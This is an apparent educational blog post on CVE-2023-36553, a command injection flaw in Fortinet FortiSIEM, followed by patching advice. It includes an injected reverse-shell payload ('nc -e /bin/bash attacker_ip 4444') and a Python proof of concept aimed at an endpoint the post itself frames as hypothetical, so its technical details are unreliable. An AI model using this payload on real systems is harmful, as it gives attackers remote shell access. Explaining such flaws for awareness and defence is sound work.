CVE-2023-36553 - OS Command Injection in Fortinet FortiSIEM – A Deep Dive

Fortinet FortiSIEM is a recognized name in the network security world, providing organizations with robust tools to gather and analyze security event data. Unfortunately, like many complex systems, it's not immune to vulnerabilities. One such critical vulnerability, tracked as CVE-2023-36553, involves improper neutralization of special elements used in OS commands, commonly known as *OS command injection*. In this post, we’ll break down what this means, how it works, and why you should care.

What is CVE-2023-36553?

CVE-2023-36553 is an *OS command injection* vulnerability present in several versions of Fortinet FortiSIEM. The flaw is due to improper neutralization (sanitization) of special elements in the API handling, which can be manipulated by attackers to execute arbitrary commands on the target system.

How Does the Vulnerability Work?

At its core, this vulnerability exists because FortiSIEM doesn’t properly sanitize input passed in API requests. This means an attacker can inject OS commands in parts of a crafted request—these commands will be executed by the underlying operating system because the application mistakenly trusts user input.

In simple words: A hacker could send a malicious API request and run ANY command on your server.

Exploit Scenario: Step-by-Step

Let’s say there’s an administrative API endpoint that’s vulnerable. Here’s how an attacker could abuse it:

1. Discover the Endpoint: The attacker finds a FortiSIEM instance running a vulnerable version and identifies (possibly through scanning or documentation) an API endpoint that takes user input and processes it in an unsafe way.

Craft the Payload: The attacker creates a malicious payload containing OS command code.

3. Send the Request: The attacker sends an HTTP POST/GET request to the vulnerable endpoint, stuffing their payload in a parameter.
4. Execution: The backend script naively passes user input to a system command without sanitizing it. The payload is executed as a real command, giving the attacker control.

Let’s see how such an attack could look.

Suppose the application has an endpoint like /api/device/add that takes a hostname parameter, and the backend runs a command like:

os.system(f"ping -c 1 {hostname}")

A benign request

{
  "hostname": "example.com"
}

A malicious request might look like

{
  "hostname": "example.com; nc -e /bin/bash attacker_ip 4444"
}

This would result in the backend running this command

ping -c 1 example.com; nc -e /bin/bash attacker_ip 4444

The part after the semicolon (nc -e /bin/bash attacker_ip 4444) opens a reverse shell from your FortiSIEM box to the attacker, giving them direct command-line access.

> WARNING: Never try this on any system you don't own or have explicit permission to test. Exploiting such vulnerabilities on live systems is a crime.

Here’s a minimal proof-of-concept for educational purposes (*don’t use maliciously!*)

import requests

# Replace with your FortiSIEM instance's URL and attacker IP
url = "https://victim-fortisiem/api/device/add";
headers = {'Content-Type': 'application/json'}
payload = {
    "hostname": "example.com; nc -e /bin/bash 10...1 4444"
}

response = requests.post(url, json=payload, headers=headers, verify=False)
print(response.text)

This code tries to trigger the vulnerability by sending a crafted payload that would instruct the server to open a reverse shell to your attacker box.

Check your FortiSIEM version: Go to the admin dashboard or run version check commands.

- Look for unexplained activity/logs: Unexpected connections, unknown users, or strange processes.

How to Fix It

Fortinet has released patches and updates addressing this vulnerability. Update immediately if you are running any of the vulnerable versions.

- Fortinet Security Advisory

More Information

- NVD: CVE-2023-36553
- MITRE CVE Details
- Fortinet PSIRT

Conclusion

CVE-2023-36553 is a critical issue: it lets attackers run any commands they want on your FortiSIEM box via a simple API request if you’re not patched. If you’re running a vulnerable version, update right now and check your log files for signs of compromise.

Stay safe out there, and patch your systems!

*© 2024 – Original writeup for educational awareness. Always practice responsible disclosure and patch management.*

Timeline

Published on: 11/14/2023 18:15:48 UTC
Last modified on: 11/20/2023 20:06:00 UTC